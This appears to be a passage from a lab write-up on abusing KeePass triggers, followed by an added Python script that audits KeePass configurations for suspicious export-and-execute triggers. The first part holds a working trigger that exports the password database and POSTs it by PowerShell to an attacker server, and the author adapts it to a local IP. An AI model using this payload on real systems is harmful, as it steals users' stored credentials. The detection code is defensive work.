<Triggers>
  <Trigger>
    <Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
    <Name>exploit</Name>
    <Events>
      <Event>
        <TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
        <Parameters>
          <Parameter>0</Parameter>
          <Parameter />
        </Parameters>
      </Event>
    </Events>
    <Conditions />
    <Actions>
      <Action>
        <TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
        <Parameters>
          <Parameter>c:\Users\John\AppData\Local\Temp\exploit.xml</Parameter> # This one
          <Parameter>KeePass XML (2.x)</Parameter>
          <Parameter />
          <Parameter />
        </Parameters>
      </Action>
      <Action>
        <TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
        <Parameters>
          <Parameter>PowerShell.exe</Parameter>
          <Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml'))) </Parameter> # And this one
          <Parameter>False</Parameter>
          <Parameter>1</Parameter>
          <Parameter />
        </Parameters>
      </Action>
    </Actions>
  </Trigger>
</Triggers>
I have to change 2 lines. The first one is to replace the Windows user name. The second is for the same thing, plus giving the address of the web server. This is my version:
...
<Parameters>
  <Parameter>c:\Users\peanutstick\AppData\Local\Temp\exploit.xml</Parameter> # This one
  <Parameter>KeePass XML (2.x)</Parameter>
...
...
  <Parameter>PowerShell.exe</Parameter>
  <Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://192.168.1.69:1337/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\peanutstick\AppData\Local\Temp\exploit.xml'))) </Parameter> # And this one
  <Parameter>False</Parameter>
...
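An added example, not part of the original post or of KeePass itself: a check a defender can run over a KeePass configuration file to flag triggers shaped like the one above. The sample config is constructed, and the meaning attached to the two action GUIDs is an assumption inferred from the parameters they carry on this page.

```python
import xml.etree.ElementTree as ET

# Action TypeGuids copied from the trigger on this page. Their meaning is an
# assumption inferred from the parameters each action carries there.
EXPORT_ACTION = "D5prW87VRr65NO2xP5RIIg=="  # output path + export format
EXEC_ACTION = "2uX4OwcwTBOe7y66y27kxw=="    # program + arguments

def audit_triggers(xml_text):
    """Return a finding for every trigger that exports the database or runs a command."""
    findings = []
    for trig in ET.fromstring(xml_text).iter("Trigger"):
        exports, commands = [], []
        for action in trig.iter("Action"):
            guid = (action.findtext("TypeGuid") or "").strip()
            params = [(p.text or "").strip() for p in action.iter("Parameter")]
            if guid == EXPORT_ACTION:
                exports.append(params[0] if params else "")
            elif guid == EXEC_ACTION:
                commands.append(" ".join(params[:2]))
        if exports or commands:
            # Export path reused in a command line = the export-then-send chain above.
            chained = any(e and e.lower() in c.lower() for e in exports for c in commands)
            findings.append({"trigger": trig.findtext("Name", "(unnamed)"),
                             "exports": exports, "commands": commands,
                             "severity": "high" if chained else "review"})
    return findings

# Constructed sample config (paths, names and the third GUID are made up).
SAMPLE = r"""<Configuration><Application><TriggerSystem><Triggers>
<Trigger><Name>sync</Name><Actions>
  <Action><TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid><Parameters>
    <Parameter>C:\Temp\out.xml</Parameter><Parameter>KeePass XML (2.x)</Parameter>
  </Parameters></Action>
  <Action><TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid><Parameters>
    <Parameter>PowerShell.exe</Parameter>
    <Parameter>-c ... ReadAllBytes('c:\temp\out.xml') ...</Parameter>
  </Parameters></Action></Actions></Trigger>
<Trigger><Name>backup</Name><Actions>
  <Action><TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid><Parameters>
    <Parameter>D:\Backup\db.xml</Parameter><Parameter>KeePass XML (2.x)</Parameter>
  </Parameters></Action></Actions></Trigger>
<Trigger><Name>benign</Name><Actions>
  <Action><TypeGuid>AAAAAAAAAAAAAAAAAAAAAA==</TypeGuid><Parameters /></Action>
</Actions></Trigger>
</Triggers></TriggerSystem></Application></Configuration>"""

if __name__ == "__main__":
    for f in audit_triggers(SAMPLE):
        print(f["severity"], f["trigger"], f["exports"], f["commands"])
```

A trigger that only exports is reported as `review` because scheduled backups use the same action; the `high` rating is reserved for an export whose output file is then handed to a command line.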